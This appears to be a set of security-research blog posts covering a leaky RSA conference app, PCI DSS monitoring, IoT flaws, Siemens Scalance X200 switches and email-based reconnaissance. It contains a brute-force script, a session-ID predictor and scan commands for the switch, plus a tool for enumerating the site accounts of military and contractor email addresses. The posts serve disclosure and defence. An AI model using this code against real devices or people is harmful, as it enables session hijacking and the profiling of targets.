INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It’s been half a decade since Apple launched their iPhone campaign titled “There’s an app for that”. In the years following, the mobile app stores (from all the major players) have continued to blossom to the point that not only are there several thousand apps that help light your way (i.e. by keeping the flashlight shining bright), but every company, cause, group, or notable event is expected to publish its own mobile application.
 
Today there are several hundred good “rapid development” kits that allow any newbie to craft and release their own mobile application, and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren’t the types of products that their owners expect to make much (if any) money from. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and WordPress site setup, let alone building a mobile app, many corporate marketing teams I’ve dealt with have not only drunk the “There’s an app for that” Kool-Aid, they appear to bathe in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices, and at the top of the sacrificial pillar, data security and integrity continue to reign supreme.
 
A few weeks ago I noticed that, in the run-up to the RSA USA 2014 conference, a new mobile application had been conceived, thrust upon the Apple and Google app stores, and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of “come see us at RSA” emails, or maybe it was topical off the back of a recent blog on the state of mobile banking application security, or perhaps both. In any case, I asked some of the IOActive consulting team who had a little bench time between jobs to have a poke at the freshly minted “RSA Conference 2014” mobile application.
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn’t expecting the application to be particularly interesting–it’s not as if it was a transactional banking application etc.–but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as to not potentially embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically, the highest-impact vulnerability had to do with the app being vulnerable to man-in-the-middle attacks, where an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, then heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens of millions) to try to phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information about every registered user of the application, including their name, surname, title, employer, and nationality.
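For the curious, verifying a claim like this takes only a few lines once you have the file off a device. Here is a minimal Python sketch that lists the tables and row counts of a bundled SQLite DB; the file name is a placeholder, and the real schema would come from inspecting the DB itself:

import sqlite3

# Enumerate every table in the app's cached DB and count its rows.
# "conference.db" is a placeholder for the file the app downloads.
conn = sqlite3.connect("conference.db")
tables = conn.execute(
    "SELECT name FROM sqlite_master WHERE type='table'").fetchall()
for (name,) in tables:
    rows = conn.execute("SELECT COUNT(*) FROM %s" % name).fetchone()[0]
    print(name, rows)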
 
 
 
I have no idea why the app developers chose to do that, but I’m pretty sure that the folks who downloaded and installed the application are unlikely to have thought that their details were being made public and published in this way. Marketers love this kind of information though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I’m betting that RSA didn’t even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it’s possible to get a list of all the other applications QuickMobile has created, presumably on its clients’ behalf.
 
 
 
As you can see from above, there are lots of popular brands and industry conferences employing their app creation services. I wonder if many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here’s a little bit of advice to any corporate marketing team. If you’re going to release your own mobile application, the security and integrity of that application are your responsibility. While you can’t outsource that, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications–unless you’re a hacker or marketing team that wants to acquire a free list of conference attendees’ names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, brake abruptly, and start all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously, with rare exceptions, and not only at the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
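To make “monitor logs and events” slightly more concrete, here is a deliberately minimal sketch of the idea in Python. The log path, pattern, and threshold are assumptions; a real environment would feed a SIEM with proper correlation rules and alerting:

import re
from collections import Counter

# Flag any source IP with an anomalous number of failed SSH logins.
FAILED = re.compile(r"Failed password .* from (\d+\.\d+\.\d+\.\d+)")
failures = Counter()

with open("/var/log/auth.log", errors="ignore") as log:
    for line in log:
        match = FAILED.search(line)
        if match:
            failures[match.group(1)] += 1

for ip, count in failures.most_common():
    if count > 20:  # arbitrary threshold for the sketch
        print("ALERT: %d failed logins from %s" % (count, ip))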
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world’s best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices, based not just on opinions and theories, but on real-life experience.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common–most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs’ security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost exactly the same vulnerabilities on these devices that have plagued software vendors over the last decade–vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse is that sometimes vendors don’t even respond to security vulnerability reports, or they just downplay the threat and don’t fix the vulnerabilities. Many vendors don’t even know how to properly deal with the security vulnerabilities being reported.
 
Some of the most common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom made protocols
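To make the SSL items concrete, here is what the “no SSL certificate validation” anti-pattern typically looks like in device or companion-app client code. This is a hypothetical sketch; the endpoint and file names are invented:

import requests

# BAD: verify=False disables certificate validation entirely, so a
# man-in-the-middle can read and alter everything, credentials included.
requests.post("https://cloud.example-vendor.com/api/login",
              data={"user": "u", "pass": "p"}, verify=False)

# BETTER: validate against a CA bundle, or pin the vendor's certificate.
requests.post("https://cloud.example-vendor.com/api/login",
              data={"user": "u", "pass": "p"}, verify="vendor-ca.pem")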
Also, vendors’ ambition for data is working against them and is increasing attack surfaces considerably. For example, all collected data is sent to the “vendor cloud” and device commands are sent from the “vendor cloud”, instead of just allowing users to connect directly to and command their devices. Hacking into the “vendor cloud” = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We’ve only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn’t change soon, it is just a matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users, given that the best solution is often simply not to buy or use many products because they are insecure by design. At this stage, it’s just a matter of being lucky and hoping that you won’t be hacked. Maybe opportunistic vendors could come up with some novel solution such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS–in a couple of days we will be releasing some of the extensive research I mentioned and on which this blog post is based.
 
I intend for this post to be a wakeup call for everyone! I’m really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn’t, then at least I have tried.
INSIGHTS | February 14, 2014

The password is irrelevant too

In this follow-up to a blog post on the Scalance X200 series switches, we look at an authentication bypass vulnerability. It isn’t particularly complicated, but it does allow us to download configuration files, log files, and a firmware image. It can also be used to upload configuration and firmware images, which causes the device to reboot.
 
The code can be found in the IOActive Labs GitHub repository.
 
If an attacker has access to a configuration file with a known password, they can use this code to update the configuration file and take over the switch’s management functions. It can also be used to mirror ports and enable or disable other services, such as telnet, SSH, or SNMP. Lastly, the same script can be used to upload a firmware image to the device sans authentication. In other words, it is *delightfully reprogrammable* until you install the patch.
 
 
This brings us to an interesting point. I asked Siemens if the SSH keys in Firmware V5.X (the fixed version) are unique per device, and I was assured that they are. If this is true, there should be no problem with me publishing a hash of the private key for my device. Don’t worry damsels and chaps, I can always patch my device with a new key later, as a demonstration of my enthusiasm for firmware. 
 
Anyway, here are two fingerprints of the private SSH key: 
 
MD5   6f09a4d77569236fd90483a85920912d
SHA256    505166f90ee05761b11a5feda24d0ccdc53ef902cdd617b330db3634cc2788f7
 
If you have one of these devices and have patched to the version that contains the fixes, you could assist the community greatly by verifying that the key gets a different fingerprint. This will independently confirm what those outstanding gentry at Siemens told me and promote confidence in their security solutions.
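The comparison itself is trivial once you have the key material. A minimal sketch, assuming you have already extracted the device’s private key file from the firmware (hashing the raw key file bytes is my assumption about the convention used above):

import hashlib
import sys

# Print MD5 and SHA256 digests of a key file for comparison with the
# fingerprints published above.
data = open(sys.argv[1], "rb").read()
print("MD5    ", hashlib.md5(data).hexdigest())
print("SHA256 ", hashlib.sha256(data).hexdigest())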
 
This neatly segues into some changes we’ve seen in the ICS-space over the last few years. 
 
The primary change in behavior I’d like to applaud is how companies are striving to develop better relationships with independent security researchers such as myself. The increase in constructive dialogue is evidenced by Siemens’ ability to receive notification and then produce a patch within three months. Years ago we were regularly waiting six months to two years for fixes.
 
In fact, I challenged vendors at S4x14 to commit to an AVERAGE TIME of security patching for externally supplied vulnerabilities. We purposefully chose the average time for this challenge, because we know that providing quality assurance for these systems is difficult and can be time consuming. After all, some bugs are just thornier than others.
 
Incidentally, this is backed up by empirical research shared with me by the inimitable Sean McBride during our conversations at S4x14. I wouldn’t want you to think I am just some un-gentlemanly shuffler or simkin, challenging hecatonchires for the sport of it (hat-tip @sergeybratus).
 
Follow @digitalbond to see the response I got to committing to an average security patch time, when my “Red/Blue Live” talk goes online. You’ll also notice that my two attackers (red team) did not manage to use the script to take over the device, despite doing so in practice sessions the night before. The ingenious Rotem Bar (blue team) demonstrated that the secret of ICS security is to simply *patch*. Apparently, it is not only possible, but effective!
…and btw, happy Valentine’s!
INSIGHTS | February 6, 2014

An Equity Investor’s Due Diligence

Information technology companies constitute the core of many investment portfolios nowadays. With so many new startups popping up, and some highly visible IPOs and acquisitions by public companies egging things on, many investors are clamoring for a piece of the action and looking for new ways to rapidly qualify or disqualify an investment; particularly so when it comes to the hottest of hot investment areas: information security companies.

Over the years I’ve found myself working with a number of private equity investment firms, helping them to review the technical merits and implications of products being brought to market by new security startups. In most cases it’s not until the B or C investment rounds that the money being sought by the fledgling company starts to get serious for the investors I know. If you’re going to be handing over money in the five to twenty million dollar range, you’re going to want to do your homework on both the company and the product opportunity.

Over the last few years I’ve noted that a sizable number of private equity investment firms have built into their portfolio review the kind of technical due diligence traditionally associated with the formal acquisition processes of Fortune 500 technology companies. It would seem that the $20,000 to $50,000 price tag for a quick-turnaround technical due diligence report is proving to be a valuable investment in a somewhat larger investment strategy.

When it comes to performing the technical due diligence on a startup (whether it’s a security or social media company for example), the process tends to require a mix of technical review and tapping past experiences if it’s to be useful, let alone actionable, to the potential investor. Here are some of the due diligence phases I recommend, and why:

    1. Vocabulary Distillation – For some peculiar reason new companies go out of their way to invent their own vocabulary as descriptors of their value proposition, or they go to great lengths to disguise the underlying processes of their technology with what can best be described as word-soup. For example, a “next-generation big-data derived heuristic determination engine” can more than adequately be summed up as “signature-based detection”. Apparently using the word “signature” in your technology description is frowned upon, so the product management folks avoid using the word (however applicable it may be). Distilling the word-soup is a key component of being able to compare apples with apples.
    2. Overlapping Technology Review – Everyone wants to portray their technology as unique, ground-breaking, or next generation. Unfortunately, when it comes to the world of security, next year’s technology is almost certainly a progression of the last decade’s worth of invention. This isn’t necessarily bad, but it is important to determine the DNA and hereditary path of the “new” technology (and subcomponents of the product the start-up is bringing to market). Being able to filter through the word-soup of the first phase and determine whether the start-up’s approach duplicates functionality from IDS, AV, DLP, NAC, etc. is critical. I’ve found that many start-ups position their technology (i.e. advancements) against antiquated and idealized versions of these prior technologies. For example, simplifying desktop antivirus products down to signature engines, while neglecting things such as heuristic engines, local-host virtualized sandboxes, and dynamic cloud analysis.
    3. Code Language Review – It’s important to look at the languages the company has employed in developing its product. Popular rapid prototyping technologies like Ruby on Rails or Python are likely acceptable for back-end systems (as employed within a private cloud), but are potential deal killers to future acquirer companies that’ll want to integrate the technology with their own existing product portfolio (i.e. they’re not going to want to rewrite the product). Similarly, a C or C++ implementation may not offer the flexibility needed for rapid evolution or integration into scalable public cloud platforms. Knowing which development technology has been used where and for what purpose can rapidly qualify or disqualify the strength of the company’s product management and engineering teams – and help orient an investor on future acquisition or IPO paths.
    4. Security Code Review – Depending upon the size of the application and the due diligence period allowed, a partial code review can yield insight into a number of increasingly critical areas – such as the stability and scalability of the code base (and consequently the maturity of the development processes and engineering team), the number and nature of vulnerabilities (i.e. security flaws that could derail the company publicly), and the effort required to integrate the product or proprietary technology with existing major platforms.
    5. Does it do what it says on the tin? – I hate to say it, but there’s a lot of snake oil being peddled nowadays. This is especially so for new enterprise protection technologies. In a nutshell, this phase focuses on the claims being made by the marketing literature and product management teams, and tests both the viability and technical merits of each of them. Test harnesses are usually created to monitor how well the technology performs in the face of real threats – ranging from the samples provided by the company’s user acceptance testing (UAT) team (i.e. the stuff they guarantee they can handle), through to common hacking tools and tactics, and on to a skilled adversary with key domain knowledge.
    6. Product Penetration Test – Conducting a detailed penetration test against the start-up’s technology, product, or service delivery platform is always thoroughly recommended. These tests tend to unveil important information about the lifecycle-maturity of the product and the potential exposure to negative media attention due to exploitable flaws. This is particularly important for consumer-focused products and services because they are the most likely to be uncovered and exposed by external security researchers and hackers, and any public exploitation can easily set back the start-up a year or more in brand equity alone. For enterprise products (e.g. appliances and cloud services) the hacker threat is different; the focus should be more upon what vulnerabilities could be introduced into the customer’s environment and how much effort would be required to re-engineer the product to meet security standards.


Obviously there’s a lot of variety in the technical capabilities of the various private equity investment firms (and private investors). Some have people capable of sifting through the marketing hype and can discern the actual intellectual property powering the start-up’s technology – but many do not. Regardless, in working with these investment firms and performing the technical due diligence on their potential investments, I’ve yet to encounter a situation where they didn’t “win” in some way or other. A particular favorite of mine is when, following a code review and penetration test that unveiled numerous serious vulnerabilities, the private equity firm was still intent on investing in the start-up but was able to use the report to negotiate much better buy-in terms with the existing investors – gaining a larger percentage of the start-up for the same amount.

INSIGHTS | January 13, 2014

The password is irrelevant

This story begins with a few merry and good hearted tweets from S4x13. These tweets in fact:
 
 
Notice the shared conviviality, and the jolly manner in which this discussion of vulnerabilities occurs.
 
It is with this same lightness in my heart that I thought I would explore the mysterious world of the Scalance X200 family.

 
So I waxed my moustache, rolled up my sleeves, and began to use the arcane powers of Quality Assurance. 
 
Ok, how would an attacker who doesn’t have default credentials or a device to test on go about investigating one of these remotely? Why, find one on Shodan of course!
 
 
Personally, I buy mine second hand from eBay with the fortune I inherited from my grandfather’s moustache wax empire.
 
The first thing an attacker would normally do is scan the device to get familiar with the ports and services. A quick nmap looks like this:
 
Nmap scan report for Unknown (192.168.0.5)
Host is up (0.0043s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 4.2 (protocol 2.0)
|_ssh-hostkey: 1024 cd:b4:33:49:62:3b:58:1a:67:5a:a3:f0:50:00:71:86 (RSA)
23/tcp  open  telnet?
80/tcp  open  http     WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
84/tcp  open  ctf?
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|_  100000  2            111/udp  rpcbind
443/tcp open  ssl/http WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
| ssl-cert: Subject: organizationName=Siemens
AG/stateOrProvinceName=BW/countryName=DE
| Not valid before: 2008-02-04T14:05:57+00:00
|_Not valid after:  2038-01-18T14:05:57+00:00
|_ssl-date: 1970-01-01T00:14:20+00:00; -43y254d14h08m05s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
MAC Address: 00:0E:8C:A3:4E:CF (Siemens AG A&D ET)
Device type: general purpose
Running: Wind River VxWorks
OS CPE: cpe:/o:windriver:vxworks
OS details: VxWorks
Network Distance: 1 hop
 
So we have a variety of management interfaces to choose from: Telnet (really in 2014?!?), SSH, HTTP, and HTTPS. All of these interfaces share the same users and default passwords you would expect, but we are looking for something more meaningful. 
 
Now that we’ve found them on Shodan (wait, they’re all air-gapped, right?), we quickly learn from the web interface that there are only two users: admin and user. Next we view the web page source and search for “password” which gives us this lovely snippet:
 
document.submitForm.encoded.value = document.logonForm.username.value + ":" + md5(document.logonForm.username.value + ":" + document.logonForm.password.value + ":" + document.submitForm.nonceA.value)
 
 
This is equivalent to the following command on Linux:
 
echo -n "admin:admin:C0A8006500005F31" | md5sum
 
 
Which is then posted to the device in a form such as this (although this one has a different password*):
 
encoded=admin%3Aafc0dc177659c8e9d72dec8a3c68650e&nonceA=C0A800610000CE29
 
Setting aside just how weak the use of MD5 is (and in fact I have written a script to brute-force credentials snatched off the wire), that nonceA value is very important. A nonce is a ‘number used once’, which is typically used to prevent cryptographic replay attacks. In other words, this random challenge value is provided by the server, to keep an attacker from simply capturing the hash on the wire and replaying it to the server later when they want to log in. This nonce, then, deserves our attention.
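As an aside, the brute-forcer mentioned above is nothing exotic. This is a minimal sketch of the idea rather than my actual script, assuming a captured ‘encoded’ hash, its nonce, and a password list on disk:

import hashlib

def crack(captured_hash, nonce, username="admin", wordlist="passwords.txt"):
    # The login form computes md5("user:pass:nonce"), so we replay the
    # same construction offline against each candidate password.
    with open(wordlist, errors="ignore") as candidates:
        for line in candidates:
            password = line.rstrip("\n")
            guess = "%s:%s:%s" % (username, password, nonce)
            if hashlib.md5(guess.encode()).hexdigest() == captured_hash:
                return password
    return None

# Hash and nonce lifted from a captured login POST (see above).
print(crack("afc0dc177659c8e9d72dec8a3c68650e", "C0A800610000CE29"))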
 
It appears that this is an ID field in the cookie, and that it is also the session ID. If I can predict session IDs, I can perform session hijacking while someone is managing the switch. So we set about estimating the entropy of this session ID, which initially appears to be 16 hex values. However, we won’t even need to create an equation, since it turns out to be COMPLETELY predictable, as you will soon see.
 
We can use WGET to fetch the page a few times and get a small sample of these nonceA values. This is what we see:
 
C0A8006500005F31,C0A8006500001A21,C0A8006500000960,C0A80065000049A6
 
This seems distinctly non-random. In fact, when I measured it more precisely, it became clear that it was sequential! A little further investigation revealed that SNMP is sometimes available to us. So we use snmpwalk on one of the devices I have at home:
 
snmpwalk -Os -c public -v 1 192.168.0.5
iso.3.6.1.2.1.1.1.0 = STRING: "Siemens, SIMATIC NET, SCALANCE X204-2,
6GK5 204-2BB10-2AA3, HW: 4, FW: V4.03"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.4196.1.1.5.2.22
iso.3.6.1.2.1.1.3.0 = Timeticks: (471614) 1:18:36.14
 
Well look at that! 
 
471614 in base 10 = 7323E in hex! I wonder if the session ID is simply the uptime in hex?
 
We do a WGET at approximately the same time and get this as a session ID:
 
C0A800610007323F
 
So if we assume the last 8 hex chars are uptime in hex (or at least close enough for us to brute-force the few values around it), then where do the first 8 hex come from? 
 
I initially imagined they were unique for each device and set out to test that theory by getting a session ID from another device found on Shodan. Keep in mind I did not attempt a login, I just fetched the page to see what the session ID was. Sure enough it was different, but the one from the switch I have wasn’t the MAC address or any other unique identifier on the switch. I spent a week missing the point here, but luckily I have excellent company at IOActive Labs. 
 
It was during discussions with my esteemed colleague Reid Wightman that he suggested it was an IP address. He pointed out that C0 and A8 are 192 and 168 in decimal. So I went and checked the IP address of the switch I have, and it was not 192.168.0.97. So again I was stumped, until I realized it was the IP address of my own client machine!
 
In other words, the nonceA was simply the address of the web client (converted to hex) connecting to the switch, concatenated with the uptime of the switch (in hex). I can practically see the developer who thought this would be a good idea. I can hear them thinking that each session is clearly distinguished by the address it is connecting from, and made impossible to brute-force with time. Time+Space, that’s too large to brute-force or estimate, right? You must admit, it has a kind of perverse logic to it. Unfortunately, it is highly predictable and insecure.
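Put differently, predicting a session ID takes two lines of arithmetic. A minimal sketch; the uptime would come from the SNMP timeticks shown earlier, give or take a few ticks to brute-force:

import ipaddress

def predict_nonce(client_ip, uptime_ticks):
    # First 8 hex chars: the web client's IPv4 address.
    # Last 8 hex chars: the switch's uptime in timeticks.
    ip_hex = "%08X" % int(ipaddress.ip_address(client_ip))
    return ip_hex + "%08X" % uptime_ticks

print(predict_nonce("192.168.0.97", 0x7323F))  # -> C0A800610007323F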
 
Go home Scalance X200 family session IDs, you’re drunk. Aside from being completely predictable, they are too small. Sixteen hex characters (64 bits) is a far cry from the 128 bits recommended by OWASP.
 
I guess that’s what they refer to in this announcement with the phrases “A potential vulnerability” and “that might allow attackers to hijack web sessions over the network without authentication”. 
 
There are a few more vulnerabilities to discuss about this switch, but to learn about those, you’ll have to see me at S4x14, or wait for the next blog post where I release a more reliable POC.
 
Usually I am one to organise a nice quiet coordinated disclosure, probably over a lavender scone and a cup of tea. I do my best to be polite, cheerful, and helpful, though I am under no obligation to do so, and there are considerable financial incentives for a researcher to never report a vulnerability at all.
 
Siemens ProductCERT should be commended for being polite and helpful, and relatively quick with this fix. They acknowledged my work and communicated clear timelines of when to expect a fix. This is precisely how they should go about communicating with us in the research community. It was at this point that I informed the good folks over at Siemens that I would verify the patch on Sep 12th. On the morning of the 12th, I tried to log in to verify the patch they had provided, and found myself blocked from doing so.
 
 
Should a firmware release with security implications only be downloadable in a forum that requires vetting and manual processing? Is it acceptable to end users that security patches are under export restriction?
 
Luckily these bans were lifted later that day and I was able to confirm the fixes. I would like to commend the Siemens ProductCERT team for fixing these issues rapidly and with great professionalism. They communicated with me securely using GPG-encrypted emails, set realistic timelines, and gave me feedback when those timelines didn’t work out. This leads me to a formal challenge based on their performance.
 
I challenge any other ICS vendors to match Siemens’ laudable response times and produce patches within 3 months for any externally submitted security vulnerabilities.
 
Stay tuned for part 2 where we release the simple Python script for authentication bypass which allows firmware and configuration upload and download.
 
*If you can crack this, and are interested in a job, please send IOActive your CV and the cleartext password used to create that credential. It is not hard, but it might take you a while….
INSIGHTS | December 4, 2013

Practical and cheap cyberwar (cyber-warfare): Part II

Disclaimer: I did not perform any illegal attacks on the mentioned websites in order to get the information I present here. No vulnerability was exploited on the websites, and they are not known to be vulnerable.
 
Given that we live in an age of information leakage, where government surveillance and espionage abound, I decided in this second part to focus on a simple technique for gathering information on human targets. If an attacker is targeting a specific country, members of the military and defense contractors would make good human targets. When targeting members of the military, an attacker would probably focus on high-ranking officers; for defense contractors, an attacker would focus on key decision makers, C-level executives, etc. Why? Because if an attacker compromises these people, they could gain access to valuable information related to their work, their personal life, and their family. Data related to their work could help an attacker strategically by enabling them to build better defenses, steal intellectual property, and craft specific attacks. Data related to a target’s personal life could help attackers blackmail the target or attack the target’s family.
 
 
There is no need to work for the NSA and have a huge budget in order to get juicy information. Everything is just one click away; attackers only need to find ways to easily milk the web. One easy way to gather information about people is to get their email addresses, as I described last year here: http://blog.ioactive.com/2012/08/the-leaky-web-owning-your-favorite-ceos.html. Basically, you use a website registration form and/or forgotten password functionality to find out whether an email address is already registered on a website. With a list of email addresses, attackers can easily enumerate the websites/services where people have accounts. Given the ever-increasing number of online accounts one person usually has, this can provide a lot of useful information. For instance, it can make phishing attacks and social engineering easier (see http://www.infosecurity-magazine.com/view/35048/hackers-target-mandiant-ceo-via-limo-service/). Also, if one of the sites where the target has an account is vulnerable, that website could be hacked in order to get the target’s account password. Due to password reuse, most of the time attackers can then compromise all of the target’s accounts.
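As an illustration, the core of such a tool is only a few lines. This is a hypothetical sketch, not the actual tool: the site database entries (endpoint URL, form parameter, and the response text that betrays a registered address) are invented and would have to be built per site:

import requests

# Hypothetical per-site fingerprints for the forgot-password trick.
SITES = {
    "example-site.com": {
        "url": "https://example-site.com/forgot-password",
        "param": "email",
        "registered_marker": "a reset link has been sent",
    },
}

def sites_with_account(email):
    hits = []
    for name, site in SITES.items():
        reply = requests.post(site["url"], data={site["param"]: email},
                              timeout=10)
        if site["registered_marker"] in reply.text:
            hits.append(name)
    return hits

for line in open("emails.txt"):
    email = line.strip()
    print(email, sites_with_account(email))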
 
 
This is intended to be easy and practical, so let’s get hands-on. I did this research about a year ago. First, I looked for US Army email addresses. After some Google.com searches, I ended up with some PDF files containing a lot of information about military people and defense contractors:

I extracted some emails and made a list. I ended up with:
 
1784 total email addresses: military (active and retired), civilians, and defense contractors.
 
I could have gotten more email addresses, but that was enough for testing purposes. I wasn’t planning on doing a real attack.
 
I had a very simple Python tool (about 50 LoC or so; thanks to my colleague Ariel Sanchez for quickly building the original version!) that can be fed a list of websites and email addresses. I had already built the website database with 20 or so common and well-known websites (I should have included military-related ones too for better results, but it still worked well). I loaded the list of email addresses I had found and ran the tool. A few minutes later I ended up with a long list of email addresses and the websites where those email addresses were used (meaning where the owners of those email addresses have accounts):
 
Site                          Accounts         %
Facebook                           308    17.26457
Google                             229    12.83632
Orbitz                             182    10.20179
WashingtonPost                     149    8.352018
Twitter                            108    6.053812
Plaxo                               93    5.213004
LinkedIn                            65    3.643498
Garmin                              45    2.522422
MySpace                             44    2.466368
Dropbox                             44    2.466368
NYTimes                             36    2.017937
NikePlus                            23    1.289238
Skype                               16    0.896861
Hulu                                13    0.7287
Economist                           11    0.616592
